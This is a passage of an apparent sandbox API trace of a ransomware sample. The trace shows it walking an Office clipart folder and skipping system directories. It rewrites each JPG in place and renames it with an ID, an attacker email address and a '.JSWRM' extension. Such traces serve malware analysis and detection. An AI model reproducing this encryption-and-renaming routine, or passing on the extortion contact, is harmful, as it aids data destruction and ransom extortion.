out: hHeap=0x1e0000) returned 1 [0089.944] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0089.944] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1531c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382947.JPG", cAlternateFileName="")) returned 1 [0089.944] lstrcmpiW (lpString1="J0382947.JPG", lpString2=".") returned 1 [0089.944] lstrcmpiW (lpString1="J0382947.JPG", lpString2="..") returned 1 [0089.944] lstrcmpiW (lpString1="J0382947.JPG", lpString2="...") returned 1 [0089.944] lstrcmpiW (lpString1="J0382947.JPG", lpString2="windows") returned -1 [0089.944] lstrcmpiW (lpString1="J0382947.JPG", lpString2="recovery") returned -1 [0089.944] lstrcmpiW (lpString1="J0382947.JPG", lpString2="perflogs") returned -1 [0089.944] lstrcmpiW (lpString1="J0382947.JPG", lpString2="documents and settings") returned 1 [0089.944] lstrcmpiW (lpString1="J0382947.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.945] lstrcmpiW (lpString1="J0382947.JPG", lpString2="system volume information") returned -1 [0089.945] lstrcmpiW (lpString1="J0382947.JPG", lpString2="msocache") returned -1 [0089.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0089.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382947.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382947.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382947.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0089.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0089.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382947.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382947.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382947.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0089.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.945] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.945] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0089.945] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382947.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.945] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=86812) returned 1 [0089.945] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.945] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15310) returned 0x24d210 [0089.946] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x15310, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x15310, lpOverlapped=0x0) returned 1 [0089.954] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.954] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x15310, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x15310, lpOverlapped=0x0) returned 1 [0089.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.955] CloseHandle (hObject=0x314) returned 1 [0089.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0089.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0089.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0089.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0089.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0089.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0089.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.956] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382947.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382947.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382947.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0089.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0089.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0089.956] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ad37, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382948.JPG", cAlternateFileName="")) returned 1 [0089.956] lstrcmpiW (lpString1="J0382948.JPG", lpString2=".") returned 1 [0089.956] lstrcmpiW (lpString1="J0382948.JPG", lpString2="..") returned 1 [0089.957] lstrcmpiW (lpString1="J0382948.JPG", lpString2="...") returned 1 [0089.957] lstrcmpiW (lpString1="J0382948.JPG", lpString2="windows") returned -1 [0089.957] lstrcmpiW (lpString1="J0382948.JPG", lpString2="recovery") returned -1 [0089.957] lstrcmpiW (lpString1="J0382948.JPG", lpString2="perflogs") returned -1 [0089.957] lstrcmpiW (lpString1="J0382948.JPG", lpString2="documents and settings") returned 1 [0089.957] lstrcmpiW (lpString1="J0382948.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.957] lstrcmpiW (lpString1="J0382948.JPG", lpString2="system volume information") returned -1 [0089.957] lstrcmpiW (lpString1="J0382948.JPG", lpString2="msocache") returned -1 [0089.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0089.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382948.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382948.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382948.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0089.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0089.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382948.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382948.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382948.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0089.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.957] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382948.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.958] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=109879) returned 1 [0089.958] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ad30) returned 0x24d210 [0089.958] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1ad30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x1ad30, lpOverlapped=0x0) returned 1 [0089.986] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.986] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1ad30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x1ad30, lpOverlapped=0x0) returned 1 [0089.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.988] CloseHandle (hObject=0x314) returned 1 [0089.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0089.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0089.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0089.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0089.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0089.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.988] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382948.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382948.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382948.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0089.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.990] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x178d2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382950.JPG", cAlternateFileName="")) returned 1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2=".") returned 1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2="..") returned 1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2="...") returned 1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2="windows") returned -1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2="recovery") returned -1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2="perflogs") returned -1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2="documents and settings") returned 1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2="system volume information") returned -1 [0089.990] lstrcmpiW (lpString1="J0382950.JPG", lpString2="msocache") returned -1 [0089.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0089.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382950.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382950.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382950.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0089.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0089.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382950.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382950.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382950.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0089.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.990] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.990] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.990] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382950.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.991] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=96466) returned 1 [0089.991] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.991] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x178d0) returned 0x24d210 [0089.992] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x178d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x178d0, lpOverlapped=0x0) returned 1 [0090.000] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.000] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x178d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x178d0, lpOverlapped=0x0) returned 1 [0090.000] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0090.001] CloseHandle (hObject=0x314) returned 1 [0090.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0090.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0090.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0090.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0090.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0090.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0090.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0090.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0090.001] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0090.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0090.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0090.001] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0090.001] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0090.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0090.002] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382950.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0382950.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0382950.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0090.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0090.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0090.002] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0090.002] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c596d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf4c596d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf4c596d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x17749, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0382952.JPG", cAlternateFileName="")) returned 1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2=".") returned 1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2="..") returned 1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2="...") returned 1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2="windows") returned -1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2="recovery") returned -1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2="perflogs") returned -1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2="documents and settings") returned 1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2="$RECYCLE.BIN") returned 1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2="system volume information") returned -1 [0090.003] lstrcmpiW (lpString1="J0382952.JPG", lpString2="msocache") returned -1 [0090.003] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0090.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382952.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0090.003] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0382952.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0382952.JPG", lpUsedDefaultChar=0x0) returned 12 [0090.003] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0090.003] 